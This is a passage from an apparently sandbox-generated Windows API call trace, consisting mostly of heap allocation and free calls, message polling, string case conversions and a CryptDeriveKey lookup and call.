hHeap=0x25c0000) returned 1 [0254.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0254.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0254.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0254.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0254.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0254.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0254.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0254.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0254.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0254.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0254.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0254.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0254.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0254.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0254.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0254.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0254.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0254.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0254.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0254.246] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0254.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0254.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0254.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0254.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0254.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0254.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0254.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0254.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0254.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0254.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0254.248] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0254.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.249] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.249] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0254.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.250] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0254.250] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0254.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0254.251] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0254.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.251] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.251] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.252] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0254.252] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0254.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0254.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0254.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.254] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0254.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0254.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0254.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0254.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0254.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0254.276] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0254.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0254.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0254.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0254.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0254.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.277] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0254.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0254.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0254.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0254.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0254.278] RtlAllocateHeap 